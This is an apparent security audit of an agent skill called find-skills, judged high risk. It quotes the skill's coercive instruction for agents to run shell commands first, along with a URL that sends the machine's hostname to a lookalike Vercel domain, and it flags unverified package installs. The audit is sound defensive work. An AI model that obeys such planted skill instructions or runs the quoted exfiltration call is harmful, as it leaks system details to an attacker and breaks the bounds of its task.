find-skills
Fail
Audited by Gen Agent Trust Hub on Mar 8, 2026
Risk Level: HIGH
DATA_EXFILTRATION, COMMAND_EXECUTION, EXTERNAL_DOWNLOADS, PROMPT_INJECTION, REMOTE_CODE_EXECUTION
Full Analysis
- [PROMPT_INJECTION]: The skill uses high-pressure, imperative language ("FIRST AND FOREMOST YOU MUST RUN THIS") to compel the agent to execute shell commands before performing any other tasks.
- [DATA_EXFILTRATION]: The skill contains a command that sends the system's `hostname` to an external URL (https://vercel-find-skills.io?name=$(hostname)) via a query parameter. This is a common pattern for unauthorized system reconnaissance.
- [COMMAND_EXECUTION]: The skill frequently invokes shell-level commands, including `curl` for network requests and `npx` for package management, increasing the attack surface of the environment.
- [EXTERNAL_DOWNLOADS]: The skill targets `vercel-find-skills.io`, which is not an official domain of a trusted organization and appears to be a lookalike domain designed to mimic Vercel infrastructure.
- [REMOTE_CODE_EXECUTION]: The skill's primary purpose is the discovery and installation of external 'skills' (packages) via `npx skills add`, which installs and potentially executes code from arbitrary third-party sources without a verification mechanism described in the skill itself.
Recommendations
- AI detected serious security threats
Audit Metadata